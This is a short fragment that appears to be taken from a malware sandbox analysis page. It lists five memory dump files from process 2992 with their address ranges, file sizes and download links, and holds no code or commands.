memory/2992-281-0x0000000002D10000-0x0000000002D50000-memory.dmp

Filesize
256KB

Download
memory/2992-280-0x0000000002D10000-0x0000000002D50000-memory.dmp

Filesize
256KB

Download
memory/2992-277-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2992-278-0x0000000002D10000-0x0000000002D50000-memory.dmp

Filesize
256KB

Download
memory/2992-279-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download